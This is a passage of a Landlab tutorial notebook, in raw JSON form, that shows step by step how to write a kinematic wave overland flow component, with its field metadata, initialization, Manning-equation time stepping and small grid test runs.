\\\"\\\"\\\"\\n\",\n \" Calculate water flow over topography.\\n\",\n \" \\n\",\n \" Landlab component that implements a two-dimensional \\n\",\n \" kinematic wave model.\\n\",\n \" \\n\",\n \" You can put other information here... Anything you \\n\",\n \" think a user might need to know. We use numpy style\\n\",\n \" docstrings written in restructured text. You can use\\n\",\n \" math formatting. \\n\",\n \" \\n\",\n \" Useful Links:\\n\",\n \" - https://www.sphinx-doc.org/en/master/usage/restructuredtext/basics.html\\n\",\n \" - https://sphinxcontrib-napoleon.readthedocs.io/en/latest/example_numpy.html\\n\",\n \"\\n\",\n \" Parameters\\n\",\n \" ----------\\n\",\n \" grid : ModelGrid\\n\",\n \" A Landlab grid object.\\n\",\n \" precip_rate : float, optional (defaults to 1 mm/hr)\\n\",\n \" Precipitation rate, mm/hr\\n\",\n \" precip_duration : float, optional (defaults to 1 hour)\\n\",\n \" Duration of precipitation, hours\\n\",\n \" infilt_rate : float, optional (defaults to 0)\\n\",\n \" Maximum rate of infiltration, mm/hr\\n\",\n \" roughnes : float, defaults to 0.01\\n\",\n \" Manning roughness coefficient, s/m^1/3\\n\",\n \"\\n\",\n \" \\\"\\\"\\\"\\n\",\n \"\\n\",\n \" def __init__(): # ignore this for now, we will add more stuff eventually.\\n\",\n \" pass\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"## Doc tests\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"The following docstring section 'Examples' should help the user understand what is the component's purpose and how it works. 
It is an example (or examples) of its use in a (more or less) simple case within the Landlab framework: a grid is created, the component is instantiated on this grid and run. Unlike in the example below, we strongly recommend commenting your example(s) to explain what is happening.\\n\",\n \"\\n\",\n \"This is also the section that will be run during the integration tests of your component (once you have submitted a pull request to have your component merged into the Landlab release branch). All lines starting with >>> are run and should produce the results you provided: here, the test will fail if `kw.vel_coeff` does not return `100.0.`\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"\\\"\\\"\\\"\\n\",\n \" Examples\\n\",\n \" --------\\n\",\n \" >>> from landlab import RasterModelGrid\\n\",\n \" >>> rg = RasterModelGrid((4, 5), 10.0)\\n\",\n \" >>> kw = KinwaveOverlandFlowModel(rg)\\n\",\n \" >>> kw.vel_coef\\n\",\n \" 100.0\\n\",\n \" >>> rg.at_node['surface_water__depth']\\n\",\n \" array([ 0., 0., 0., 0., 0.,\\n\",\n \" 0., 0., 0., 0., 0.,\\n\",\n \" 0., 0., 0., 0., 0.,\\n\",\n \" 0., 0., 0., 0., 0.])\\n\",\n \" \\\"\\\"\\\"\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"### Header information: `_name`\\n\",\n \"Every component should have a name, as a string. Normally this will be the same as the class name.\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"_name = \\\"KinwaveOverlandFlowModel\\\"\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"### Header information: `_unit_agnostic`\\n\",\n \"\\n\",\n \"Components also indicate whether they are unit agnostic or not. Unit agnostic components require that component users are consistent with units within and across components used in a single application, but do not require that inputs conform to a specific set of units. \\n\",\n \"\\n\",\n \"This component is not unit agnostic because it includes an assumption that time units will be in hours but assumes that the Manning coefficient will be provided with time units of seconds. \"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"_unit_agnostic = False\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"### Header information: `_info`\\n\",\n \"\\n\",\n \"\\n\",\n \"All the metadata about the fields that a components requires and creates is described in a datastructured called `Component._info`. \\n\",\n \"\\n\",\n \"Info is a dictionary with one key for each field. The value associated with that key is a dictionary that must contain all of the following elements (and no other elements). \\n\",\n \"\\n\",\n \"* \\\"dtype\\\": a python data type\\n\",\n \"* \\\"intent\\\": a string indicating whether the field is an input (\\\"in\\\"), and output (\\\"out\\\"), or both (\\\"inout\\\")\\n\",\n \"* \\\"optional\\\": a boolean indicating whether the field is an optional input or output\\n\",\n \"* \\\"units\\\": a string indicating what units the field has (use \\\"-\\\")\\n\",\n \"* \\\"mapping\\\": a string indicating the grid element (e.g., node, cell) on which the field is located\\n\",\n \"* \\\"doc\\\": a string describing the field. 
\\n\",\n \"\\n\",\n \"The code in the Component base class will check things like:\\n\",\n \"* Can the component be created if all of the required inputs exist?\\n\",\n \"* Is all this information present? Is something extra present?\\n\",\n \"* Does the component create outputs of the correct dtype?\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"_info = {\\n\",\n \" \\\"surface_water__depth\\\": {\\n\",\n \" \\\"dtype\\\": float,\\n\",\n \" \\\"intent\\\": \\\"out\\\",\\n\",\n \" \\\"optional\\\": False,\\n\",\n \" \\\"units\\\": \\\"m\\\",\\n\",\n \" \\\"mapping\\\": \\\"node\\\",\\n\",\n \" \\\"doc\\\": \\\"Depth of water on the surface\\\",\\n\",\n \" },\\n\",\n \" \\\"topographic__elevation\\\": {\\n\",\n \" \\\"dtype\\\": float,\\n\",\n \" \\\"intent\\\": \\\"in\\\",\\n\",\n \" \\\"optional\\\": False,\\n\",\n \" \\\"units\\\": \\\"m\\\",\\n\",\n \" \\\"mapping\\\": \\\"node\\\",\\n\",\n \" \\\"doc\\\": \\\"Land surface topographic elevation\\\",\\n\",\n \" },\\n\",\n \" \\\"topographic__gradient\\\": {\\n\",\n \" \\\"dtype\\\": float,\\n\",\n \" \\\"intent\\\": \\\"in\\\",\\n\",\n \" \\\"optional\\\": False,\\n\",\n \" \\\"units\\\": \\\"m/m\\\",\\n\",\n \" \\\"mapping\\\": \\\"link\\\",\\n\",\n \" \\\"doc\\\": \\\"Gradient of the ground surface\\\",\\n\",\n \" },\\n\",\n \" \\\"water__specific_discharge\\\": {\\n\",\n \" \\\"dtype\\\": float,\\n\",\n \" \\\"intent\\\": \\\"out\\\",\\n\",\n \" \\\"optional\\\": False,\\n\",\n \" \\\"units\\\": \\\"m2/s\\\",\\n\",\n \" \\\"mapping\\\": \\\"link\\\",\\n\",\n \" \\\"doc\\\": \\\"flow discharge component in the direction of the link\\\",\\n\",\n \" },\\n\",\n \" \\\"water__velocity\\\": {\\n\",\n \" \\\"dtype\\\": float,\\n\",\n \" \\\"intent\\\": \\\"out\\\",\\n\",\n \" \\\"optional\\\": False,\\n\",\n \" \\\"units\\\": \\\"m/s\\\",\\n\",\n \" \\\"mapping\\\": \\\"link\\\",\\n\",\n \" \\\"doc\\\": \\\"flow velocity component in the direction of the link\\\",\\n\",\n \" },\\n\",\n \"}\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"### Class with complete header information\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"import numpy as np\\n\",\n \"\\n\",\n \"from landlab import Component, FieldError\\n\",\n \"\\n\",\n \"\\n\",\n \"class KinwaveOverlandFlowModel(Component):\\n\",\n \" \\\"\\\"\\\"\\n\",\n \" Calculate water flow over topography.\\n\",\n \" \\n\",\n \" Landlab component that implements a two-dimensional \\n\",\n \" kinematic wave model.\\n\",\n \" \\n\",\n \" Construction:\\n\",\n \" \\n\",\n \" KinwaveOverlandFlowModel(grid, [stuff to be added later])\\n\",\n \" \\n\",\n \" Parameters\\n\",\n \" ----------\\n\",\n \" grid : ModelGrid\\n\",\n \" Landlab ModelGrid object\\n\",\n \" precip_rate : float, optional (defaults to 1 mm/hr)\\n\",\n \" Precipitation rate, mm/hr\\n\",\n \" precip_duration : float, optional (defaults to 1 hour)\\n\",\n \" Duration of precipitation, hours\\n\",\n \" infilt_rate : float, optional (defaults to 0)\\n\",\n \" Maximum rate of infiltration, mm/hr\\n\",\n \" roughness : float, defaults to 0.01\\n\",\n \" Manning roughness coefficient, s/m^1/3\\n\",\n \" \\\"\\\"\\\"\\n\",\n \" \\n\",\n \" _name = \\\"KinwaveOverlandFlowModel\\\"\\n\",\n \"\\n\",\n \" _unit_agnostic = False\\n\",\n \" \\n\",\n \" _info = {\\n\",\n \" \\\"surface_water__depth\\\": {\\n\",\n \" \\\"dtype\\\": float,\\n\",\n \" 
\\\"intent\\\": \\\"out\\\",\\n\",\n \" \\\"optional\\\": False,\\n\",\n \" \\\"units\\\": \\\"m\\\",\\n\",\n \" \\\"mapping\\\": \\\"node\\\",\\n\",\n \" \\\"doc\\\": \\\"Depth of water on the surface\\\",\\n\",\n \" },\\n\",\n \" \\\"topographic__elevation\\\": {\\n\",\n \" \\\"dtype\\\": float,\\n\",\n \" \\\"intent\\\": \\\"in\\\",\\n\",\n \" \\\"optional\\\": False,\\n\",\n \" \\\"units\\\": \\\"m\\\",\\n\",\n \" \\\"mapping\\\": \\\"node\\\",\\n\",\n \" \\\"doc\\\": \\\"Land surface topographic elevation\\\",\\n\",\n \" },\\n\",\n \" \\\"topographic__gradient\\\": {\\n\",\n \" \\\"dtype\\\": float,\\n\",\n \" \\\"intent\\\": \\\"in\\\",\\n\",\n \" \\\"optional\\\": False,\\n\",\n \" \\\"units\\\": \\\"m/m\\\",\\n\",\n \" \\\"mapping\\\": \\\"link\\\",\\n\",\n \" \\\"doc\\\": \\\"Gradient of the ground surface\\\",\\n\",\n \" },\\n\",\n \" \\\"water__specific_discharge\\\": {\\n\",\n \" \\\"dtype\\\": float,\\n\",\n \" \\\"intent\\\": \\\"out\\\",\\n\",\n \" \\\"optional\\\": False,\\n\",\n \" \\\"units\\\": \\\"m2/s\\\",\\n\",\n \" \\\"mapping\\\": \\\"link\\\",\\n\",\n \" \\\"doc\\\": \\\"flow discharge component in the direction of the link\\\",\\n\",\n \" },\\n\",\n \" \\\"water__velocity\\\": {\\n\",\n \" \\\"dtype\\\": float,\\n\",\n \" \\\"intent\\\": \\\"out\\\",\\n\",\n \" \\\"optional\\\": False,\\n\",\n \" \\\"units\\\": \\\"m/s\\\",\\n\",\n \" \\\"mapping\\\": \\\"link\\\",\\n\",\n \" \\\"doc\\\": \\\"flow velocity component in the direction of the link\\\",\\n\",\n \" },\\n\",\n \" }\\n\",\n \"\\n\",\n \" def __init__(): # ignore this for now, we will add more stuff eventually.\\n\",\n \" pass\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"## The initialization method (`__init__`)\\n\",\n \"Every Landlab component should have an `__init__` method. The parameter signature should start with a `ModelGrid` object as the first parameter. Following this are component-specific parameters. In our example, the parameters for the kinematic wave model include: precipiation rate, precipitation duration, infiltration rate, and roughness coefficient (Manning's n).\\n\",\n \"\\n\",\n \"The first thing the component `__init__` should do is call the `super` method. This calls the `__init__` of the component's base class. \\n\",\n \"\\n\",\n \"Two things a component `__init__` method common does are (1) store the component's parameters as class attributes, and (2) create the necessary fields. When creating grid fields, it is important to first check to see whether a field with the same name (and mapping) already exists. 
For example, a driver or another component might have already created `topographic__elevation` when our kinematic wave component is initialized.\\n\",\n \"\\n\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"def __init__(\\n\",\n \" self, grid, precip_rate=1.0, precip_duration=1.0, infilt_rate=0.0, roughness=0.01\\n\",\n \"):\\n\",\n \" \\\"\\\"\\\"Initialize the KinwaveOverlandFlowModel.\\n\",\n \"\\n\",\n \" Parameters\\n\",\n \" ----------\\n\",\n \" grid : ModelGrid\\n\",\n \" Landlab ModelGrid object\\n\",\n \" precip_rate : float, optional (defaults to 1 mm/hr)\\n\",\n \" Precipitation rate, mm/hr\\n\",\n \" precip_duration : float, optional (defaults to 1 hour)\\n\",\n \" Duration of precipitation, hours\\n\",\n \" infilt_rate : float, optional (defaults to 0)\\n\",\n \" Maximum rate of infiltration, mm/hr\\n\",\n \" roughness : float, defaults to 0.01\\n\",\n \" Manning roughness coefficient, s/m^1/3\\n\",\n \" \\\"\\\"\\\"\\n\",\n \" super().__init__(grid)\\n\",\n \"\\n\",\n \" # Store parameters and do unit conversion\\n\",\n \" self._current_time = 0\\n\",\n \"\\n\",\n \" self._precip = precip_rate / 3600000.0 # convert to m/s\\n\",\n \" self._precip_duration = precip_duration * 3600.0 # h->s\\n\",\n \" self._infilt = infilt_rate / 3600000.0 # convert to m/s\\n\",\n \" self._vel_coef = 1.0 / roughness # do division now to save time\\n\",\n \"\\n\",\n \" # Create fields...\\n\",\n \" # Elevation\\n\",\n \" self._elev = grid.at_node[\\\"topographic__elevation\\\"]\\n\",\n \"\\n\",\n \" # Slope\\n\",\n \" self._slope = grid.at_link[\\\"topographic__gradient\\\"]\\n\",\n \"\\n\",\n \" self.initialize_output_fields()\\n\",\n \" self._depth = grid.at_node[\\\"surface_water__depth\\\"]\\n\",\n \" self._vel = grid.at_link[\\\"water__velocity\\\"]\\n\",\n \" self._disch = grid.at_link[\\\"water__specific_discharge\\\"]\\n\",\n \"\\n\",\n \" # Calculate the ground-surface slope (assume it won't change)\\n\",\n \" self._slope[self._grid.active_links] = self._grid.calc_grad_at_link(self._elev)[\\n\",\n \" self._grid.active_links\\n\",\n \" ]\\n\",\n \" self._sqrt_slope = np.sqrt(self._slope)\\n\",\n \" self._sign_slope = np.sign(self._slope)\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"## The \\\"go\\\" method, `run_one_step()`\\n\",\n \"Every Landlab component will have a method that implements the component's action. The go method can have any name you like, but the preferred practice for time-advancing components is to use the standard name `run_one_step()`. Landlab assumes that if a component has a method with this name, it will (a) be the primary \\\"go\\\" method, and (b) will be fully standardized as described here.\\n\",\n \"\\n\",\n \"The `run_one_step` method should take either zero or one argument. If there is an argument, it should be a duration to run, `dt`; i.e., a timestep length. If the component does not evolve as time passes, this argument may be missing (see, e.g., the FlowRouter, which returns a steady state flow pattern independent of time).\\n\",\n \"\\n\",\n \"The first step in the algorithm in the example below is to calculate water depth *at the links*, where we will be calculating the water discharge. In this particular case, we'll use the depth at the upslope of the two nodes. 
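Conceptually, that "upwind" choice can be sketched in a few lines of NumPy (the function and array names below are hypothetical, purely to illustrate the idea; Landlab ships this logic as a ready-made grid method, named in the next sentence):

    import numpy as np

    def upwind_depth_at_links(z_at_node, h_at_node, tail_nodes, head_nodes):
        """For each link, take the water depth at whichever end node is higher."""
        head_is_higher = z_at_node[head_nodes] > z_at_node[tail_nodes]
        return np.where(head_is_higher, h_at_node[head_nodes], h_at_node[tail_nodes])
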
The grid method to do this, `map_value_at_max_node_to_link`, is one of many mapping functions available.\\n\",\n \"\\n\",\n \"We then calculate velocity using the Manning equation, and specific discharge by multiplying velocity by depth.\\n\",\n \"\\n\",\n \"Mass balance for the cells around nodes is computed using the `calc_flux_div_at_node` grid method.\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"def run_one_step(self, dt):\\n\",\n \" \\\"\\\"\\\"Calculate water flow for a time period `dt`.\\n\",\n \"\\n\",\n \" Default units for dt are *seconds*.\\n\",\n \" \\\"\\\"\\\"\\n\",\n \" # Calculate water depth at links. This implements an \\\"upwind\\\" scheme\\n\",\n \" # in which water depth at the links is the depth at the higher of the\\n\",\n \" # two nodes.\\n\",\n \" H_link = self._grid.map_value_at_max_node_to_link(\\n\",\n \" \\\"topographic__elevation\\\", \\\"surface_water__depth\\\"\\n\",\n \" )\\n\",\n \"\\n\",\n \" # Calculate velocity using the Manning equation.\\n\",\n \" self._vel = (\\n\",\n \" -self._sign_slope * self._vel_coef * H_link ** 0.66667 * self._sqrt_slope\\n\",\n \" )\\n\",\n \"\\n\",\n \" # Calculate discharge\\n\",\n \" self._disch = H_link * self._vel\\n\",\n \"\\n\",\n \" # Flux divergence\\n\",\n \" dqda = self._grid.calc_flux_div_at_node(self._disch)\\n\",\n \"\\n\",\n \" # Rate of change of water depth\\n\",\n \" if self._current_time < self._precip_duration:\\n\",\n \" ppt = self._precip\\n\",\n \" else:\\n\",\n \" ppt = 0.0\\n\",\n \" dHdt = ppt - self._infilt - dqda\\n\",\n \"\\n\",\n \" # Update water depth: simple forward Euler scheme\\n\",\n \" self._depth[self._grid.core_nodes] += dHdt[self._grid.core_nodes] * dt\\n\",\n \"\\n\",\n \" # Very crude numerical hack: prevent negative water depth\\n\",\n \" self._depth[np.where(self._depth < 0.0)[0]] = 0.0\\n\",\n \"\\n\",\n \" self._current_time += dt\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"## Changes to boundary conditions\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"Sometimes, (though not in this example), it proves convenient to hard-code assumptions about boundary conditions into the `__init__` method. \\n\",\n \"\\n\",\n \"We can resolve this issue by creating an additional component method that updates these components that can be called if the boundary conditions change. Whether the boundary conditions have changed can be assessed with a grid method called `bc_set_code`. 
This is an `int` which will change if the boundary conditions change.\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"def __init__(self):\\n\",\n \" \\\"\\\"\\\"Initialize the Component.\\n\",\n \" ...\\n\",\n \" \\\"\\\"\\\"\\n\",\n \" super().__init__(grid)\\n\",\n \"\\n\",\n \" # Store grid and parameters and do unit conversion\\n\",\n \" self._bc_set_code = self._grid.bc_set_code\\n\",\n \" # ...\\n\",\n \"\\n\",\n \"\\n\",\n \"def updated_boundary_conditions(self):\\n\",\n \" \\\"\\\"\\\"Call if boundary conditions are updated.\\n\",\n \" \\\"\\\"\\\"\\n\",\n \" # do things necessary if BCs are updated.\\n\",\n \"\\n\",\n \"\\n\",\n \"def run_one_step(self, dt):\\n\",\n \" \\\"\\\"\\\"Calculate water flow for a time period `dt`.\\n\",\n \" \\\"\\\"\\\"\\n\",\n \" if self._bc_set_code != self.grid.bc_set_code:\\n\",\n \" self.updated_boundary_conditions()\\n\",\n \" self._bc_set_code = self.grid.bc_set_code\\n\",\n \" # Do rest of run one step\\n\",\n \" # ...\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"## The complete component\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"import numpy as np\\n\",\n \"\\n\",\n \"from landlab import Component\\n\",\n \"\\n\",\n \"\\n\",\n \"class KinwaveOverlandFlowModel(Component):\\n\",\n \" \\\"\\\"\\\"Calculate water flow over topography.\\n\",\n \"\\n\",\n \" Landlab component that implements a two-dimensional\\n\",\n \" kinematic wave model. This is an extremely simple, unsophisticated\\n\",\n \" model, originally built simply to demonstrate the component creation\\n\",\n \" process. Limitations to the present version include: infiltration is\\n\",\n \" handled very crudely, the called is responsible for picking a stable\\n\",\n \" time step size (no adaptive time stepping is used in the `run_one_step`\\n\",\n \" method), precipitation rate is constant for a given duration (then zero),\\n\",\n \" and all parameters are uniform in space. Also, the terrain is assumed\\n\",\n \" to be stable over time. 
Caveat emptor!\\n\",\n \"\\n\",\n \" Examples\\n\",\n \" --------\\n\",\n \" >>> from landlab import RasterModelGrid\\n\",\n \" >>> rg = RasterModelGrid((4, 5), xy_spacing=10.0)\\n\",\n \" >>> z = rg.add_zeros(\\\"topographic__elevation\\\", at=\\\"node\\\")\\n\",\n \" >>> s = rg.add_zeros(\\\"topographic__gradient\\\", at=\\\"link\\\")\\n\",\n \" >>> kw = KinwaveOverlandFlowModel(rg)\\n\",\n \" >>> kw.vel_coef\\n\",\n \" 100.0\\n\",\n \" >>> rg.at_node['surface_water__depth']\\n\",\n \" array([ 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.,\\n\",\n \" 0., 0., 0., 0., 0., 0., 0.])\\n\",\n \" \\\"\\\"\\\"\\n\",\n \"\\n\",\n \" _name = \\\"KinwaveOverlandFlowModel\\\"\\n\",\n \"\\n\",\n \" _unit_agnostic = False\\n\",\n \"\\n\",\n \" _info = {\\n\",\n \" \\\"surface_water__depth\\\": {\\n\",\n \" \\\"dtype\\\": float,\\n\",\n \" \\\"intent\\\": \\\"out\\\",\\n\",\n \" \\\"optional\\\": False,\\n\",\n \" \\\"units\\\": \\\"m\\\",\\n\",\n \" \\\"mapping\\\": \\\"node\\\",\\n\",\n \" \\\"doc\\\": \\\"Depth of water on the surface\\\",\\n\",\n \" },\\n\",\n \" \\\"topographic__elevation\\\": {\\n\",\n \" \\\"dtype\\\": float,\\n\",\n \" \\\"intent\\\": \\\"in\\\",\\n\",\n \" \\\"optional\\\": False,\\n\",\n \" \\\"units\\\": \\\"m\\\",\\n\",\n \" \\\"mapping\\\": \\\"node\\\",\\n\",\n \" \\\"doc\\\": \\\"Land surface topographic elevation\\\",\\n\",\n \" },\\n\",\n \" \\\"topographic__gradient\\\": {\\n\",\n \" \\\"dtype\\\": float,\\n\",\n \" \\\"intent\\\": \\\"in\\\",\\n\",\n \" \\\"optional\\\": False,\\n\",\n \" \\\"units\\\": \\\"m/m\\\",\\n\",\n \" \\\"mapping\\\": \\\"link\\\",\\n\",\n \" \\\"doc\\\": \\\"Gradient of the ground surface\\\",\\n\",\n \" },\\n\",\n \" \\\"water__specific_discharge\\\": {\\n\",\n \" \\\"dtype\\\": float,\\n\",\n \" \\\"intent\\\": \\\"out\\\",\\n\",\n \" \\\"optional\\\": False,\\n\",\n \" \\\"units\\\": \\\"m2/s\\\",\\n\",\n \" \\\"mapping\\\": \\\"link\\\",\\n\",\n \" \\\"doc\\\": \\\"flow discharge component in the direction of the link\\\",\\n\",\n \" },\\n\",\n \" \\\"water__velocity\\\": {\\n\",\n \" \\\"dtype\\\": float,\\n\",\n \" \\\"intent\\\": \\\"out\\\",\\n\",\n \" \\\"optional\\\": False,\\n\",\n \" \\\"units\\\": \\\"m/s\\\",\\n\",\n \" \\\"mapping\\\": \\\"link\\\",\\n\",\n \" \\\"doc\\\": \\\"flow velocity component in the direction of the link\\\",\\n\",\n \" },\\n\",\n \" }\\n\",\n \"\\n\",\n \" def __init__(\\n\",\n \" self,\\n\",\n \" grid,\\n\",\n \" precip_rate=1.0,\\n\",\n \" precip_duration=1.0,\\n\",\n \" infilt_rate=0.0,\\n\",\n \" roughness=0.01,\\n\",\n \" ):\\n\",\n \" \\\"\\\"\\\"Initialize the KinwaveOverlandFlowModel.\\n\",\n \"\\n\",\n \" Parameters\\n\",\n \" ----------\\n\",\n \" grid : ModelGrid\\n\",\n \" Landlab ModelGrid object\\n\",\n \" precip_rate : float, optional (defaults to 1 mm/hr)\\n\",\n \" Precipitation rate, mm/hr\\n\",\n \" precip_duration : float, optional (defaults to 1 hour)\\n\",\n \" Duration of precipitation, hours\\n\",\n \" infilt_rate : float, optional (defaults to 0)\\n\",\n \" Maximum rate of infiltration, mm/hr\\n\",\n \" roughness : float, defaults to 0.01\\n\",\n \" Manning roughness coefficient, s/m^1/3\\n\",\n \" \\\"\\\"\\\"\\n\",\n \" super().__init__(grid)\\n\",\n \"\\n\",\n \" # Store parameters and do unit conversion\\n\",\n \" self._current_time = 0\\n\",\n \"\\n\",\n \" self._precip = precip_rate / 3600000.0 # convert to m/s\\n\",\n \" self._precip_duration = precip_duration * 3600.0 # h->s\\n\",\n \" self._infilt = infilt_rate / 3600000.0 # convert to m/s\\n\",\n \" 
self._vel_coef = 1.0 / roughness # do division now to save time\\n\",\n \"\\n\",\n \" # Create fields...\\n\",\n \" # Elevation\\n\",\n \" self._elev = grid.at_node[\\\"topographic__elevation\\\"]\\n\",\n \"\\n\",\n \" # Slope\\n\",\n \" self._slope = grid.at_link[\\\"topographic__gradient\\\"]\\n\",\n \"\\n\",\n \" self.initialize_output_fields()\\n\",\n \" self._depth = grid.at_node[\\\"surface_water__depth\\\"]\\n\",\n \" self._vel = grid.at_link[\\\"water__velocity\\\"]\\n\",\n \" self._disch = grid.at_link[\\\"water__specific_discharge\\\"]\\n\",\n \"\\n\",\n \" # Calculate the ground-surface slope (assume it won't change)\\n\",\n \" self._slope[self._grid.active_links] = self._grid.calc_grad_at_link(self._elev)[\\n\",\n \" self._grid.active_links\\n\",\n \" ]\\n\",\n \" self._sqrt_slope = np.sqrt(self._slope)\\n\",\n \" self._sign_slope = np.sign(self._slope)\\n\",\n \"\\n\",\n \" @property\\n\",\n \" def vel_coef(self):\\n\",\n \" \\\"\\\"\\\"Velocity coefficient.\\n\",\n \"\\n\",\n \" (1/roughness)\\n\",\n \" \\\"\\\"\\\"\\n\",\n \" return self._vel_coef\\n\",\n \"\\n\",\n \" def run_one_step(self, dt):\\n\",\n \" \\\"\\\"\\\"Calculate water flow for a time period `dt`.\\n\",\n \"\\n\",\n \" Default units for dt are *seconds*.\\n\",\n \" \\\"\\\"\\\"\\n\",\n \" # Calculate water depth at links. This implements an \\\"upwind\\\" scheme\\n\",\n \" # in which water depth at the links is the depth at the higher of the\\n\",\n \" # two nodes.\\n\",\n \" H_link = self._grid.map_value_at_max_node_to_link(\\n\",\n \" \\\"topographic__elevation\\\", \\\"surface_water__depth\\\"\\n\",\n \" )\\n\",\n \"\\n\",\n \" # Calculate velocity using the Manning equation.\\n\",\n \" self._vel = (\\n\",\n \" -self._sign_slope * self._vel_coef * H_link ** 0.66667 * self._sqrt_slope\\n\",\n \" )\\n\",\n \"\\n\",\n \" # Calculate discharge\\n\",\n \" self._disch[:] = H_link * self._vel\\n\",\n \"\\n\",\n \" # Flux divergence\\n\",\n \" dqda = self._grid.calc_flux_div_at_node(self._disch)\\n\",\n \"\\n\",\n \" # Rate of change of water depth\\n\",\n \" if self._current_time < self._precip_duration:\\n\",\n \" ppt = self._precip\\n\",\n \" else:\\n\",\n \" ppt = 0.0\\n\",\n \" dHdt = ppt - self._infilt - dqda\\n\",\n \"\\n\",\n \" # Update water depth: simple forward Euler scheme\\n\",\n \" self._depth[self._grid.core_nodes] += dHdt[self._grid.core_nodes] * dt\\n\",\n \"\\n\",\n \" # Very crude numerical hack: prevent negative water depth\\n\",\n \" self._depth[np.where(self._depth < 0.0)[0]] = 0.0\\n\",\n \"\\n\",\n \" self._current_time += dt\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"from landlab import RasterModelGrid\\n\",\n \"\\n\",\n \"nr = 3\\n\",\n \"nc = 4\\n\",\n \"rg = RasterModelGrid((nr, nc), 10.0)\\n\",\n \"rg.add_empty(\\\"topographic__elevation\\\", at=\\\"node\\\")\\n\",\n \"rg.add_zeros(\\\"topographic__gradient\\\", at=\\\"link\\\")\\n\",\n \"rg.at_node[\\\"topographic__elevation\\\"][:] = rg.x_of_node.copy()\\n\",\n \"kinflow = KinwaveOverlandFlowModel(rg, precip_rate=100.0, precip_duration=100.0)\\n\",\n \"\\n\",\n \"for i in range(100):\\n\",\n \" kinflow.run_one_step(1.0)\\n\",\n \"print(\\\"The discharge from node 6 to node 5 should be -0.000278 m2/s:\\\")\\n\",\n \"print(rg.at_link[\\\"water__specific_discharge\\\"][8])\\n\",\n \"print(\\\"The discharge from node 5 to node 4 should be -0.000556 m2/s:\\\")\\n\",\n \"print(rg.at_link[\\\"water__specific_discharge\\\"][7])\"\n ]\n },\n {\n 
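Where do the two expected discharge values printed above come from? Each core node sits in a 10 m x 10 m cell, rain falls on it at 100 mm/hr, and once the flow has had time to settle, whatever lands on a cell must leave across its downslope face (flow is in the -x direction here, which is why the values are negative). A quick back-of-the-envelope check, independent of the component and assuming the grid spacing and precipitation rate used above:

    precip = 100.0 / 3600000.0            # 100 mm/hr converted to m/s
    cell_area = 10.0 * 10.0               # m2, the cell around one core node
    face_width = 10.0                     # m, width of the cell face a link crosses
    print(-precip * cell_area / face_width)      # one cell drains across this face: ~ -0.000278 m2/s
    print(-precip * 2 * cell_area / face_width)  # two cells drain across this face: ~ -0.000556 m2/s
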
\"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"Next, we'll test the component on a larger grid and a larger domain.\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"nr = 62\\n\",\n \"nc = 42\\n\",\n \"rg = RasterModelGrid((nr, nc), 10.0)\\n\",\n \"rg.add_empty(\\\"topographic__elevation\\\", at=\\\"node\\\")\\n\",\n \"rg.at_node[\\\"topographic__elevation\\\"] = 0.01 * rg.y_of_node\\n\",\n \"rg.add_zeros(\\\"topographic__gradient\\\", at=\\\"link\\\")\\n\",\n \"kinflow = KinwaveOverlandFlowModel(rg, precip_rate=100.0, precip_duration=100.0)\\n\",\n \"for i in range(1800):\\n\",\n \" kinflow.run_one_step(1.0)\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"Plot the topography:\"\n ]\n },\n {\n \"cell_type\": \"code\",\n \"execution_count\": null,\n \"metadata\": {},\n \"outputs\": [],\n \"source\": [\n \"%matplotlib inline\\n\",\n \"from landlab.plot import imshow_grid\\n\",\n \"\\n\",\n \"imshow_grid(rg, \\\"topographic__elevation\\\")\"\n ]\n },\n {\n \"cell_type\": \"markdown\",\n \"metadata\": {},\n \"source\": [\n \"The steady solution should be as follows. The unit discharge at the bottom edge should equal the precipitation rate, 100 mm/hr, times the slope length.\\n\",\n 